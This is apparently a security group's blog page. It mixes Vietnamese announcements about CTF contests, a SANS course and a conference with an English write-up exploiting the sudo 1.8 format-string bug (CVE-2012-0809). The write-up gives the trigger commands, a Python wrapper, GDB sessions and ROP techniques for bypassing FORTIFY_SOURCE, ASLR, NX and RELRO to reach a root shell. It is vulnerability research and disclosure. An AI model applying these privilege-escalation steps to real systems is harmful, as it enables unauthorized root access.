Snatching The H@t

November 25, 2012 by admin · Leave a Comment 

Snacthing the H@t

Nhận lời mời từ IDG, VNSecurity đồng ý đứng ra phối hợp tổ chức cuộc thi “Snatching the h@t” như một sự kiện trong khuôn khổ hội thảo CSO Asean năm 2012 với mong muốn giới thiệu và phát triển CTF như một hình thức học tập và thể hiện khả năng lành mạnh đến cộng đồng. VNSecurity là nhóm được biết đến rộng rãi trong giới nghiên cứu an toàn thông tin thực thụ tại Việt nam và thế giới. Các thành viên chủ chốt của nhóm là những chuyên gia uy tín về an ninh thông tin trong và ngoài nước, các kết quả nghiên cứu của họ thường được vinh danh và công bố tại nhiều cuộc hội thảo uy tín trên thế giới: Blackhat, Hitb, Pacsec, Deepsec, Syscan … Đội thi đấu CLGT của VNSecurity cũng nằm trong top những đội CTF hàng đầu trên thế giới

Về cuộc thi Snatching the h@t

Cuộc thi “Snatching the h@t” năm nay sẽ bao gồm 2 vòng: vòng loại và vòng chung kết. Vòng loại được thi đấu trực tuyến thông qua mạng Internet. Các đội đứng đầu ở vòng loại sẽ được tham gia thi đấu ở vòng chung kết tại khách sạn New World ở TP HCM. Các thông tin về cuộc thi, đơn vị bảo trợ,… xin vui lòng xem tại website của IDG tại http://cso.org.vn/contest

Hiện vòng loại của cuộc thi đang diễn ra được 1/2 thời gian với hơn 100 đội tham gia. Đội PiggyBird đến từ Hà Nội đang tạm dẫn đầu với 1800 điểm. Vòng loại dự kiến sẽ kết thúc vào lúc 09 giờ sáng thứ 2 26/11/2012, kéo dài thêm 12 tiếng so với dự kiến ban đầu do hệ thống website thi đấu bị tấn công DDoS và cần thời gian khắc phục.

Thông tin cần biết:

Về hình thức thi đấu CTF

CTF – Môn thể thao trí tuệ của giới hacker!

CTF (Capture the Flag) là một cuộc thi kiến thức chuyên sâu về bảo mật máy tính, được tổ chức theo mô hình trò chơi chiến tranh mạng, tập trung vào hai kỹ năng tấn công và phòng thủ mạng máy tính của người chơi. Các đội tham gia CTF sẽ được cấp một máy chủ (hoặc một mạng máy chủ) đã cài đặt sẵn nhiều chương trình chứa các lỗ hổng bảo mật. Nhiệm vụ của đội chơi là tìm ra các lỗ hổng đó, tấn công các máy chủ của các đội khác để ghi điểm, đồng thời phải nhanh chóng vá các lỗ hổng trên máy chủ của đội nhà, để tránh bị tấn công bởi các đội khác.

CTF hấp dẫn và thu hút giới hacker bởi lẽ các cuộc thi này phản ánh rất chân thật công việc hàng ngày và đòi hỏi người chơi phải có các kỹ năng của một hacker thực thụ. Muốn chiến thắng ở một cuộc thi CTF, người chơi không chỉ phải nhuần nhuyễn các kỹ năng phát hiện và khai thác lỗ hổng bảo mật, mà còn phải thật sự lành nghề trong việc bảo vệ sự an toàn và duy trì tính liên tục của hệ thống mạng trước các đợt tấn công dồn dập từ bên ngoài.

Với cường độ và áp lực rất cao, cho nên mặc dù thể lệ CTF thường cho phép cá nhân tham gia nhưng chiến thắng thường thuộc về các đội có nhiều thành viên có trình độ cao và có khả năng “phối hợp tác chiến” hiệu quả.

Các cuộc thi CTF ngày nay thường chia thành 3 hình thức chơi chính:

 • Tấn công & phòng thủ (attack & defence) như luật chơi cổ điển ban đầu.
 • Hình thức thứ 2 là trả lời thử thách theo từng chủ đề (Jeopardy-style). Hình thức này thông thường sẽ chia theo chủ đề được phân theo các phân mục như : Web, Forensic, Crypto, Binary, Pwnable… Ở mỗi phân mục sẽ có các câu hỏi theo độ khó tăng dần.
 • Hình thức thứ 3 là sự kết hợp của hình thức 1 và 2, chẳng hạn như kết hợp giữa hình thức chỉ có tấn công (attack only) với các dạng thử thách khác nhau. Đây cũng chính là hình thức của cuộc thi Snatching the h@t năm nay.

Việc tham gia thi đấu các kỳ CTF cũng là dịp để giúp học hỏi thêm nhiều kinh nghiệm và kiến thức bổ ích. Lịch sử CTF đã ghi nhận sự tham gia của rất nhiều hacker trẻ mà sau này đã trở thành những chuyên gia bảo mật tên tuổi trên thế giới.

Share and Enjoy:
 • Digg
 • del.icio.us
 • Facebook
 • Google Bookmarks
 • Add to favorites
 • Reddit
 • Technorati
 • Tumblr
 • Twitter
 • Slashdot
 • Identi.ca

Exploiting Sudo format string vunerability

February 16, 2012 by longld · 7 Comments 

In this post we will show how to exploit format string vulnerability in sudo 1.8 that reliably bypasses FORTIFY_SOURCE, ASLR, NX and Full RELRO protections. Our test environment is Fedora 16 which is shipped with a vulnerable sudo version (sudo-1.8.2p1).

The vulnerability

Vulnerability detail can be found in CVE-2012-0809. In summary, executing sudo in debug mode with crafted argv[0] will trigger the format string bug. E.g:

$ ln -s /usr/bin/sudo ./%n
$ ./%n -D9

The exploit

Though above format string vulnerability is straight, it is not easy to exploit on modern Linux distributions. sudo binary in Fedora 16 comes with:

In order to exploit format string bug we have to bypass all above protections, but thanks to this local bug, we can disable ASLR easily with resources limit trick (another notes, prelink is enabled on Fedora 16 so it also disable ASLR from local exploits). As a consequence, NX can be defeated with return-to-libc/ROP with known addresses. The most difficult part is bypassing FORTIFY_SOURCE.

Bypassing FORTIFY_SOURCE

We just follow “A Eulogy for Format Strings” article from Phrack #67 by Captain Planet wit very detail steps to bypass FORTIFY_SOURCE. In summary, there is an integer overflow bug in FORTIFY_SOURCE patch, by exploiting this we can turn off _IO_FLAGS2_FORTIFY bit in file stream and use “%n” operation from a writable address. Following steps will be done:

 1. Set nargs to a big value so (nargs * 4) will be truncated to a small integer value, the perfect value is nargs = 0×40000000, so nargs * 4 = 0. The format string to achieve this looks like: “%*1073741824$”
 2. Turn off _IO_FLAGS2_FORTIFY on stderr file stream
 3. Reset nargs = 0 to bypass check loop

Let examine #2 and #3 in detail. We create a wrapper (sudo-exploit.py) then fire a GDB session:

#!/usr/bin/env python
import os
import sys

def exploit(vuln):
  fmtstring = "%*123$ %*456$ %1073741824$"
  args = [fmtstring, "-D9"]
  env = os.environ
  os.execve(vuln, args, env)

if __name__ == "__main__":
  if len(sys.argv) < 2:
    usage()
  else:
    exploit(sys.argv[1])
# ulimit -s unlimited
# gdb -q /usr/bin/sudo
Reading symbols from /usr/bin/sudo...Reading symbols from /usr/lib/debug/usr/bin/sudo.debug...done.
done.
gdb$ set exec-wrapper ./sudo-exploit.py
gdb$ run
process 2149 is executing new program: /usr/bin/sudo
*** invalid %N$ use detected ***

Program received signal SIGABRT, Aborted.
gdb$ bt
#0 0x40038416 in ?? ()
#1 0x400bc98f in __GI_raise (sig=0x6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2 0x400be2d5 in __GI_abort () at abort.c:91
#3 0x400fbe3a in __libc_message (do_abort=0x1, fmt=0x401f3dea "%s") at ../sysdeps/unix/sysv/linux/libc_fatal.c:198
#4 0x400fbf64 in __GI___libc_fatal (message=0x401f5a6c "*** invalid %N$ use detected ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:209
#5 0x400d1df5 in _IO_vfprintf_internal (s=0xbff42498, format=<optimized out>, ap=0xbff42b78 <incomplete sequence \340>) at vfprintf.c:1771
#6 0x400d566b in buffered_vfprintf (s=0x40234920, format=<optimized out>, args=<optimized out>) at vfprintf.c:2207
#7 0x400d0cad in _IO_vfprintf_internal (s=0x40234920, format=0x4023b958 "%*123$ %*456$ %1073741824$: settings: %s=%s\n", ap=0xbff42b78 <incomplete sequence \340>) at vfprintf.c:1256
#8 0x401958a1 in ___vfprintf_chk (fp=0x40234920, flag=0x1, format=0x4023b958 "%*123$ %*456$ %1073741824$: settings: %s=%s\n", ap=0xbff42b78 <incomplete sequence \340>) at vfprintf_chk.c:35
#9 0x400094a0 in vfprintf (__ap=0xbff42b78 <incomplete sequence \340>, __fmt=<optimized out>, __stream=<optimized out>) at /usr/include/bits/stdio2.h:128
#10 sudo_debug (level=0x9, fmt=0x4000dff3 "settings: %s=%s") at ./sudo.c:1202
#11 0x400082cd in parse_args (argc=0x1, argv=0x4023b730, nargc=0xbff42d20, nargv=0xbff42d24, settingsp=0xbff42d28, env_addp=0xbff42d2c) at ./parse_args.c:413
#12 0x40002890 in main (argc=0x2, argv=0xbff42df4, envp=0xbff42e00) at ./sudo.c:203

gdb$ list vfprintf.c:1688
1683	  /* Fill in the types of all the arguments. */
1684	  for (cnt = 0; cnt < nspecs; ++cnt)
1685	   {
1686		/* If the width is determined by an argument this is an int. */
1687		if (specs[cnt].width_arg != -1)
1688		 args_type[specs[cnt].width_arg] = PA_INT;
1689
1690		/* If the precision is determined by an argument this is an int. */
1691		if (specs[cnt].prec_arg != -1)
1692		 args_type[specs[cnt].prec_arg] = PA_INT;
gdb$ break vfprintf.c:1688
Breakpoint 1 at 0x400d1c5b: file vfprintf.c, line 1688.

gdb$ run
process 2157 is executing new program: /usr/bin/sudo
  0x400d1c53 <_IO_vfprintf_internal+4531>:	mov  eax,DWORD PTR [edi+0x20]
  0x400d1c56 <_IO_vfprintf_internal+4534>:	cmp  eax,0xffffffff
  0x400d1c59 <_IO_vfprintf_internal+4537>:	je   0x400d1c68 <_IO_vfprintf_internal+4552>
=> 0x400d1c5b <_IO_vfprintf_internal+4539>:	mov  edx,DWORD PTR [ebp-0x484]
  0x400d1c61 <_IO_vfprintf_internal+4545>:	mov  DWORD PTR [edx+eax*4],0x0
  0x400d1c68 <_IO_vfprintf_internal+4552>:	mov  eax,DWORD PTR [edi+0x1c]
  0x400d1c6b <_IO_vfprintf_internal+4555>:	cmp  eax,0xffffffff
  0x400d1c6e <_IO_vfprintf_internal+4558>:	je   0x400d1c7d <_IO_vfprintf_internal+4573>

Breakpoint 1, _IO_vfprintf_internal (s=0xbfe48748, format=<optimized out>, ap=0xbfe48e28 <incomplete sequence \340>) at vfprintf.c:1688
1688		 args_type[specs[cnt].width_arg] = PA_INT;

gdb$ p &s->_flags2
$1 = (_IO_FILE **) 0xbf845310
gdb$ p/d (char*)&s->_flags2 - *(int)($ebp-0x484)
$2 = 11396

gdb$ p &nargs
$3 = (size_t *) 0xbf844e74
gdb$ p/d (char*)&nargs - *(int)($ebp-0x484)
$4 = 1924

s->_flags2 and nargs is on stack with fixed relative offsets to current stack pointer, so we can adjust offsets according to relative stack addresses to fulfill #2 & #3. Let do this again and calculate correct values when we have final format string for the exploit.

Bypassing Full RELRO

We can now use “%n” primitive to write anywhere with any value, but where to write to? sudo binary is compiled with Full RELRO, this means we cannot write to GOT entry or dynamic->.fini to redirect the execution as they are read-only. The idea here is simple: we try to overwrite function pointer in libc or ld-linux and hope it will be called later in program to trigger redirection. This works smoothly with sudo case.

# ln -s /usr/bin/sudo ./%x
# ulimit -s unlimited
# gdb -q ./%x
gdb$ list sudo.c:204
199	  memset(&user_details, 0, sizeof(user_details));
200	  user_info = get_user_info(&user_details);
201
202	  /* Parse command line arguments. */
203	  sudo_mode = parse_args(argc, argv, &nargc, &nargv, &settings, &env_add);
204	  sudo_debug(9, "sudo_mode %d", sudo_mode);
205
206	  /* Print sudo version early, in case of plugin init failure. */
207	  if (ISSET(sudo_mode, MODE_VERSION)) {
208		printf("Sudo version %s\n", PACKAGE_VERSION);

gdb$ break sudo.c:207
gdb$ run -D9
4000e036: settings: 9=en_US.UTF-8
4000e0bc: settings: %x=en_US.UTF-8
4000e0c5: settings: true=en_US.UTF-8
4000e0fc: settings: 10.0.2.15/255.255.255.0 fe80::a00:27ff:fe9e:e68c/ffff:ffff:ffff:ffff::=en_US.UTF-8
a0001: sudo_mode -1078177084
Breakpoint 1, main (argc=0x2, argv=0xbfbc5394, envp=0xbfbc53a0) at ./sudo.c:207
207	    if (ISSET(sudo_mode, MODE_VERSION)) {

gdb$ vmmap libc
Start	End	Perm	Name
0x400a8000 0x4024d000 r-xp /lib/libc-2.14.90.so
0x4024d000 0x4024f000 r--p /lib/libc-2.14.90.so
0x4024f000 0x40250000 rw-p /lib/libc-2.14.90.so
gdb$ x/8wx 0x4024f000
0x4024f000:	0x401da990	0x40122490	0x40121e10	0x401227a0
0x4024f010:	0x4013fc60	0x40122fb0	0x40027f20	0x401223e0
gdb$ x/8i 0x40121e10
0x40121e10 <__GI___libc_malloc>:	sub    esp,0x3c
0x40121e13 <__GI___libc_malloc+3>:	mov    DWORD PTR [esp+0x2c],ebx
0x40121e17 <__GI___libc_malloc+7>:	call   0x401db813 <__i686.get_pc_thunk.bx>
0x40121e1c <__GI___libc_malloc+12>:	add    ebx,0x12d1d8
0x40121e22 <__GI___libc_malloc+18>:	mov    DWORD PTR [esp+0x30],esi
0x40121e26 <__GI___libc_malloc+22>:	mov    esi,DWORD PTR [esp+0x40]
0x40121e2a <__GI___libc_malloc+26>:	mov    DWORD PTR [esp+0x34],edi
0x40121e2e <__GI___libc_malloc+30>:	mov    DWORD PTR [esp+0x38],ebp

gdb$ set *0x4024f008=0x41414141
gdb$ continue
Program received signal SIGSEGV, Segmentation fault.
0x400bee20 <realloc@plt+0>:	jmp    DWORD PTR [ebx+0x10]
0x400bee26 <realloc@plt+6>:	push   0x8
0x400bee2b <realloc@plt+11>:	jmp    0x400bee00
=> 0x400bee30 <malloc@plt+0>:	jmp    DWORD PTR [ebx+0x14]
0x400bee36 <malloc@plt+6>:	push   0x10
0x400bee3b <malloc@plt+11>:	jmp    0x400bee00
0x400bee40 <memalign@plt+0>:	jmp    DWORD PTR [ebx+0x18]
0x400bee46 <memalign@plt+6>:	push   0x18
0x400bee30 in malloc@plt () from /lib/libc.so.6
gdb$ x/x $ebx+0x14
0x4024f008:	0x41414141

Bypassing NX

The last part of our exploit is bypassing NX and this can be done via libc ROP gadgets as its address now is fixed. We spray the environment with target payload and use a stack pivot gadget (add esp, 0xNNN) to jump to it. Out payload will look like:

[ ROP NOPs | setuid, execve, 0, &/bin/sh, nullptr, nullptr ]

Or we can use another simple version to avoid NULL byte:

[ ROP NOPs | execve, exit, &./custom_shell, nullptr, nullptr ]

Where “./custom_shell” is an available string in libc (e.g: “./0123456789:;<=>?”)

Exploit code

To not spoil the fun of people who may want to try it, I will post it later :)

Further notes

FORTIFY_SOURCE on x86_x64

The technique we use here to bypass FORTIFY_SOURCE failed work on x86_64 as we can not find a nargs value (32-bit) that satisfies: (nargs * 4) is truncated to a small 64-bit value. I hope someone will find new ways to bypass it on x86_64.

Reliability of exploit

Though we disable ASLR, stack address is not affected and sometimes there is a gap between current stack pointer and our payload in environment and we may fail to perform stack pivoting. In order to achieve reliability, we have to spray the environment carefully. Update: 65K environment is enough for 100% reliability on Fedora (thanks to brainsmoke)

Update: exploit on grsecurity/PaX-enabled kernel

Our exploit on Fedora16 with vanilla kernel relies on a single address: libc base address. With PaX’s ASLR implementation we have to bruteforce for 20-bits and this is definitely hard with proper ASLR. Though “ulimit -s unlimited” has no real effect on grsecurity/PaX-enabled kernel, it can help to reduce 4-bits entropy of library addresses. 16-bits bruteforcing still requires average 32K+ runs and is hopeless with grsecurity’s bruteforce deterring (15 minutes locked out of system for a failed try).

We had to re-work to make our exploit has a chance to win ASLR. Obviously, we cannot pick any address of library or binary to overwrite, the only way now is to overwrite available addresses on stack. *Fortunately*, we can overwrite saved EIP of sudo_debug() directly as there is pointers to it on stack. Following GDB session shows that:

gdb$ backtrace
#0 sudo_debug (level=0x9, fmt=0xb772c013 "settings: %s=%s") at ./sudo.c:1192
#1 0xb77262ed in parse_args (argc=0x1, argv=0xb7734dc8, nargc=0xbfffe720, nargv=0xbfffe724, settingsp=0xbfffe728, env_addp=0xbfffe72c) at ./parse_args.c:413
#2 0xb77208b0 in main (argc=0x2, argv=0xbfffe7f4, envp=0xbfffe800) at ./sudo.c:203
gdb$ pref 0xb77262ed
Found 5 results:
0xbfffe030 --> 0xbfffe56c --> 0xb77262ed (0xb77262ed <parse_args+1837>:	mov  eax,DWORD PTR [esp+0x2c])
0xbfffe060 --> 0xbfffe56c --> 0xb77262ed (0xb77262ed <parse_args+1837>:	mov  eax,DWORD PTR [esp+0x2c])
0xbfffe0c0 --> 0xbfffe56c --> 0xb77262ed (0xb77262ed <parse_args+1837>:	mov  eax,DWORD PTR [esp+0x2c])
0xbfffe0f0 --> 0xbfffe56c --> 0xb77262ed (0xb77262ed <parse_args+1837>:	mov  eax,DWORD PTR [esp+0x2c])
0xbfffe2a0 --> 0xbfffe56c --> 0xb77262ed (0xb77262ed <parse_args+1837>:	mov  eax,DWORD PTR [esp+0x2c])

By chosing to return to near by function inside sudo binary (e.g my_execve()), we can effectively reduce the entropy down to 4-bits with a short write (%hn):

gdb$ run
gdb$ p my_execve
$1 = {int (const char *, char * const *, char * const *)} 0xb7721fe0 <my_execve>

gdb$ run
gdb$ p my_execve
$2 = {int (const char *, char * const *, char * const *)} 0xb7726fe0 <my_execve>

This is a quite good improvement, even on PaX-enabled kernel we only need few tries to get a root shell. But with grsecurity’s bruteforce deterring, I don’t know how long it will take (maybe days) as I failed to get a shell after a day. Though we have a good exploit against real ASLR, it is still far from ideal “one-shot exploit”. One-shot exploit can only be done if we are able to leak the library/binary address then (ab)use it on the fly.

In TODO part of Phrack 67 article, the author mentioned that he could not stabilize the use of copy (read+write) primitive when abusing printf(). I decided to reproduce his experiment under a new condition: stack limit is lifted with “ulimit -s unlimited”. After hundred of tries for different offsets, we can stabilize the copy, which means we successfully leak the address and abuse it on the fly. Hunting for address on stack is easy now, we can choose to pick saved EIP of sudo_debug itself or any address of libc available on stack (e.g from __vfprintf_internal function). Then we calculate the offset from there to an exec() function, copy (read+write) it to overwrite saved EIP of sudo_debug() with a format string looks like “%*123$x %456x %789$n”. By repeating the write step, we are able to create custom arguments on stack to prepare for a valid execution via exec() and achieve a one-shot pwn.

Notes

 • We rarely find pointer to save EIP of functions on stack for direct overwrite like this case
 • Direct parameter access is 12-bytes each unlike 4-bytes each in normal format string exploit. This will limit your ability to write to arbitrary pointer on stack.
 • Copy primitive uses unsigned value, so if library/binary base is mapped at high address (e.g 0xb7NNNNNN) we will fail to leak the address on the fly (it is still an open problem, hope someone can find out). With PaX’s ASLR, we are in luck as it maps library/binary start at something like 0×2NNNNNNN in the effect of “ulimit -s unlimited” (so it actually has effect :)).
Share and Enjoy:
 • Digg
 • del.icio.us
 • Facebook
 • Google Bookmarks
 • Add to favorites
 • Reddit
 • Technorati
 • Tumblr
 • Twitter
 • Slashdot
 • Identi.ca

Học viện SANS đến Việt Nam 03/2012

December 20, 2011 by suto · 1 Comment 

Những ai làm về lĩnh vực an toàn thông tin chắc đều biết đến học viện SANS như là một học viện hàng đầu thế giới về đào tạo an toàn thông tin. Học viện SANS, được thành lập từ năm 1989, đã đào tạo hơn 165,000 chuyên gia an toàn thông tin khắp nơi trên thế giới trong đó có những nhà quản lý an toàn thông tin cao cấp, chuyên gia đánh giá an ninh hay các quản trị viên hệ thống cho các tập đoàn hàng đầu thế giới hay các cơ quan an ninh chính phủ. Học viện SANS còn có một hệ thống tài liệu nghiên cứu khổng lồ về an toàn thông tin và điều hành trung tâm cảnh báo an ninh Internet.

Các chứng chỉ an toàn thông tin của học viện SANS được công nhận trên toàn thế giới và luôn được đánh giá là chứng chỉ hàng đầu về an toàn thông tin. Thông thường các khóa học của học viện SANS hàng năm diễn ra ở Mỹ, Châu Âu và một vài nước Châu Á. Việc học và thi chứng chỉ của SANS nói riêng hay các chứng chỉ quốc tế khác thường mất khá nhiều thời gian và tốn kém tại Việt nam. Như một bước khởi đầu cho việc đào tạo an toàn thông tin ở Việt nam, học viện SANS lần đầu tiên mở một khóa học SANS 560 về Kiểm Định An Toàn Thông Tin Mạng (“Network Penetration Testing and Ethical Hacking”) vào đầu năm 2012 tại thành phố Hồ Chí Minh.

Học viên sẽ được tổ chức thi chứng chỉ GIAC Penetration Tester (GIAC GPEN) tại chỗ. Đây là chứng chỉ uy tín nhất hiện nay dành cho chuyên gia an toàn thông tin trong việc kiểm định an toàn thông tin mạng.

Thời gian: Tháng 03, 2012
Địa điểm: The Fleminton Tower
182 Lê Đại Hành, Quận 11
Thành phố Hồ Chí Minh, Việt nam

Để đăng kí khóa học, xin vui lòng truy cập vào http://www.sans.org/mentor/details.php?nid=27046. SANS hiện có chương trình giảm giá cho các công ty, tổ chức về an toàn thông tin tại Việt nam cũng như các công ty đăng ký từ 02 học viên trở lên. Để có được mã giảm giá, xin vui lòng email thanh _AT_ vnsecurity.net  trước khi đăng ký.

Thông tin chi tiết hơn về khóa học có thể xem ở đây.

Thông tin tham khảo:

 1. http://force.vnsecurity.net/download/SANS-560-VN.pdf
 2. https://www.sans.org/security-training/network-penetration-testing-ethical-hacking-937-mid
 3. http://www.giac.org/certification/penetration-tester-gpen
 4. http://www.sans.org/mentor/details.php?nid=27046
Share and Enjoy:
 • Digg
 • del.icio.us
 • Facebook
 • Google Bookmarks
 • Add to favorites
 • Reddit
 • Technorati
 • Tumblr
 • Twitter
 • Slashdot
 • Identi.ca

Hội thảo Tết 2012

December 16, 2011 by admin · Leave a Comment 

Tết Nhâm Thìn 2012 năm nay, VNSECURITY phối hợp cùng HVA tổ chức một hội thảo mini, nơi diễn giả trong và ngoài nước trình bày và trao đổi về những kinh nghiệm thiết thực trong việc đảm bảo an toàn cho sản phẩm cũng như hệ thống thông tin của doanh nghiệp cũng như những nghiên cứu và phát triển mới nhất trong lĩnh vực an toàn thông tin ở Việt Nam và thế giới.

Vui lòng đăng ký tham gia và gửi bài tham luận ở http://tetcon.org.

Ngày quan trọng

 • Hạn chót gửi đề tài: 31/12/2011.
 • Ngày công bố chương trình: 3/1/2012.
 • Ngày hội thảo: 13/1/2012.

Quyền lợi diễn giả

Nếu được chọn làm diễn giả, bạn sẽ được:

 • Mời dự họp mặt tất niên của HVA.
 • Mời dự hợp mặt tất niên của VNSECURITY – CLGT.
 • Nếu bạn không ở Sài Gòn, có thể chúng tôi sẽ đài thọ vé máy bay khứ hồi và khách sạn.
Share and Enjoy:
 • Digg
 • del.icio.us
 • Facebook
 • Google Bookmarks
 • Add to favorites
 • Reddit
 • Technorati
 • Tumblr
 • Twitter
 • Slashdot
 • Identi.ca

#4th at hack.lu CTF

September 21, 2011 by admin · Leave a Comment 

Thanks FluxFingers for the great #CTF at hack.lu!!!!

final_score

Share and Enjoy:
 • Digg
 • del.icio.us
 • Facebook
 • Google Bookmarks
 • Add to favorites
 • Reddit
 • Technorati
 • Tumblr
 • Twitter
 • Slashdot
 • Identi.ca

« Previous PageNext Page »